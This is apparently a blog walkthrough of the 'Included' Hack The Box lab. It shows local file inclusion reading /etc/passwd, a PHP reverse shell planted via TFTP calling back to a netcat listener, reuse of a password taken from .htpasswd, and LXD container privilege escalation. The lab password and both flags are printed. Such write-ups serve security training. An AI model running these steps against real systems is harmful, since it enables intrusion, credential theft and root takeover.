top of page

Included (VIP only)


Enumeration


As usual, let's start with nmap:

nmap -sV -sC 10.129.166.191

Let's also do an udp scan too using:

sudo nmap -sU 10.129.166.191

Enter your password

udp scans takes a lot longer than the usual tcp scans, be patient. Also, udp scans require to use sudo

Note that port 69 udp is open, which is associated with tftp.


Port 80 is open, so let's check the website by going to : http://10.129.166.191

Even though I typed http://10.129.166.191, I got redirected to http://10.129.166.191/?file=home.php


This looks like file inclusion, explaining the name of the machine "included"


Let's try it. Let's see if we can access the file /etc/passwd using http://10.129.166.191/?file=/etc/passwd

Great!


Using curl, we can have a nicer display of users

curl http://10.129.166.191/?file=/etc/passwd

What is the /etc/passwd file?

  • The /etc/passwd file keeps track of all the registered users on the system. It is a colon-separated file ( : )

  • It contains, in this order, user name, encrypted password, UID, GID, user home directory, login shell

  • The file /etc/passwd is owned by the root user but must be readable by all users. Only root can write this file.

  • Then encrypted passwords are stored in /etc/security/passwd file



Earlier, we found from the udp scan that udp port 69/udp is open, which is associated with tftp


Let's install tftp first using:

sudo apt install tftp

Once installed, type:

tftp 10.129.166.191
By default TFTP works without the need for authentication, meaning that anyone can upload and download files from the remote system!


Foothold


Open a new command prompt window and type:

locate webshells

cd /usr/share/webshells/php

ls

We are interested in php-reverse-shell.php. Let's make a copy first, called shell.php

sudo cp php-reverse-shell.php shell.php
ls

Let's now move shell.php to our home directory

sudo mv shell.php /home/htb-sneakymouse/
Your home directory will be different

Now open a new command prompt window and type:

ls

We can see shell.php is now here in our home directory


Now let's edit this shell.php file using:

sudo nano shell.php

Scroll down until you see:

We need to change the $ip to the IP of our VM

if you don't know the IP of your VM, open a new command prompt window and type ifconfig

We need to change the $port to 4444 (this is because we will set up our netcat listener on port 4444)

When done, use:

Ctrl X

Press Y

Press enter


Now that we have shell.php ready, we need to upload it to the target using tftp. Go back to your tftp session and type:

put shell.php
Make sure you are in your home directory for the command above, as we will now upload shell.php

Now that we have uploaded our file we can just quit:

quit

Now let's open a new command prompt window and set up our netcat listener on port 4444

nc -lnvp 4444

Now go the url http://10.129.166.191/?file=/var/lib/tftpboot/shell.php

Nothing happens but this is triggering the shell.php file on the target machine. Now go back to your netcat and you should have a connection:

We got the shell! Let's upgrade the shell using:

python3 -c 'import pty;pty.spawn("/bin/bash")'

ls
whoami

cd home
ls

cd mike
ls
cat user.txt

We are www-data and we are not allowed to read user.txt in mike directory



Lateral movement


Let's look for some credentials in:

cd var/www/html

ls -al

.htpasswd is where we store the password for the website

cat .htpasswd

We got the password! Maybe mike is using the same password to access the system

Sheffield19


su mike

When prompted for the password, type:

Sheffield19

We got in and we are now Mike

id

cd /home
ls
cd mike
ls
cat user.txt

Congratulations! You got the user flag!


a56ef91d70cfbf2cdb8f454c006935a1



Privilege escalation

sudo -l

mike was not granted sudo right on the machine


id

Let's google lxd and lxd privilege escalation. We find that we can escalate our privileges using lxd. With lxd, we can run system containers. system containers are like a full OS, almost like a VM.


From you VM, open a new command prompt window and follow the steps below:

sudo apt install -y golang-go debootstrap rsync gpg squashfs-tools

--> this installs the Go programming languages along with some other required packages


git clone https://github.com/lxc/distrobuilder

--> this downloads a copy of distrobuilder. We need distrobuilder to create container images for lxd

cd distrobuilder

make

--> distrobuilder has been built successfully!



Create a new directory called ContainerImages and a directory inside it called alpine using:

mkdir ContainerImages
cd ContainerImages
mkdir alpine
cd alpine

Let's also download the alpine.yaml file using:

wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml

ls

Let's now build it:

sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.8

when done you should have something like this


ls

we now have lxd.tar.xz and rootfs.squashfs


Let's create a web service on port 8000 on our VM using:

python3 -m http.server 8000

Now let's switch back to the shell on the target.

Type:

cd /tmp

wget http://10.10.14.82:8000/rootfs.squashfs

--> this go retrieve the rootfs.squashfs from the webserver we just created on our VM and download the file to the target machine

wget http://10.10.14.82:8000/lxd.tar.xz

--> this go retrieve the lxd.tar.xz from the webserver we just created on our VM and download the file to the target machine

ls

Now the files are on the target machine!


lxc image import lxd.tar.xz rootfs.squashfs --alias alpine

--> this import the image and call it with the alias alpine

lxc image list

--> we use this command to make sure the image has been imported properly


lxc init alpine privesc -c security.privileged=true

lxc list

lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true

lxc start privesc

lxc exec privesc /bin/sh

We got a shell! not the prettiest shell but that will do!


cd /mnt/root/root

cat root.txt

Congratulations! You got the root flag!


cc693d9c7499d9f572ee375d4c14c7bcfca



429 views0 comments

Recent Posts

See All

Archetype

Oopsie

Vaccine

Comments

Rated 0 out of 5 stars.
No ratings yet

Add a rating
bottom of page